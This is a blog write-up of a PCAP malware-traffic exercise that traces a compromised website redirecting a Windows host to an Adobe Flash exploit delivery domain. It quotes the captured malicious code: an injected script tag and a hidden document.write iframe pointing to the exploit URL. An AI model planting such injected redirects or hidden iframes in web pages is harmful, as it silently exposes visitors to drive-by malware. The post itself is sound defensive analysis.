PCAP Analysis – 3

Posted by

As my winter vacations come to an end, I decided to start warming up my brain in preparation for the final semester of my graduate program. Malware-Traffic-Analysis.net is a very good resource for practicing PCAP analysis. In this article, I describe my answers to the analysis questions of the PCAP file available here.

Note: In this article, I’m using Splunk / Wireshark for the complete PCAP analysis.

root@malnet:~/malware_traffic_exercises/2014-12-15# zeek -Cr 2014-12-15-traffic-analysis-exercise.pcap

root@malnet:~/malware_traffic_exercises/2014-12-15# ls
2014-12-15-traffic-analysis-exercise.pcap  conn.log  dhcp.log  dns.log  files.log  http.log  packet_filter.log  ssl.log  weird.log  x509.log

Hostnames of Windows VMs

The hostnames of the three Windows hosts are:


IP Address of Infected Windows Host and Compromised Website

In the snap below, we can see that there is traffic to on unusual port, 22780. From past experience, I know that malware often communicates on unusual ports.

The machine with IP address, 192[.]168[.]204[.]137 communicated with a remote host, epzqy[.]iphaeba[.]eu with IP address, 168[.]235[.]69[.]248 and successfully downloads three files.

After extracting the files using Wireshark, I hashed them and checked on VirusTotal.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# sha256sum *
db44b3235157740309e417751f5f244c3077fe35196456e1c19862bf18eee64f  48950
d748b12fd4058ca4bc3c2667ac5d445fa65e132a3bf0da0c067e20716240eb88  claimpl
9872a87cc4ce1b9430ad1567dd009191c441f9c7973ad6fb3a5f455ed6235866  land

48950 file was detected as malicious on VirusTotal and seems to be exploiting Adobe Flash.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# file 48950 
48950: Macromedia Flash data (compressed), version 19

With the above information, it can be said that epzqy[.]iphaeba[.]eu with IP address, 168[.]235[.]69[.]248 is delivering malware. The domain, http://www[.]theopen[.]be/ with IP address, 213[.]186[.]33[.]19 is compromised because it is capable of redirecting users to the above malicious domain. The Windows host with IP address, 192[.]168[.]204[.]137 and MAC address, 00:0c:29:9d:b8:6d is infected. No other host downloaded the malware as seen before in the downloaded files snap.

Redirect Link Between Malware Delivery and Compromised Website

In Wireshark, I exported packets relevant to the infected Windows host, 192[.]168[.]204[.]137 into a separate PCAP file.

Using the filter, http.request I displayed all requests made by the infected host to remote domains. First contact with the malware delivery website was made at packet number 344 with the referrer as http://theopen[.]be which is the compromised website. Previously, there was another redirect to the domain, col[.]reganhosting[.]com from the compromised website.

Using Wireshark I extracted index.html page of the compromised website and link.js file that was downloaded from col[.]reganhosting[.]com. In link.js, there exists a redirect to the malware delivery website as can be seen below:

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat link.js 
document.write(("<iframe src='http://epzqy.iphaeba.eu:22780/flow/17610/avenue/67785/source/43028/total/7782/misery/swirl/some/29364/patience/interval/ford/settle/knot/55468/anyone/land/' name='yBnYN' width=13 height=10 frameborder=0 marginheight=0 marginwidth=0 scrolling=no> "));

In index.html of the compromised website, there is a redirect to the malicious website, col[.]reganhosting[.]com.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat index.html
</html><script type='text/javascript' src='http://col.reganhosting.com/link'></script>

Thanks for reading!

In this article, I described my analysis for the provided PCAP file. The most important aspect of this analysis was to find the redirect link that occurs from the compromised website to the malware delivery domain.

Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!

Leave a Reply

Your email address will not be published.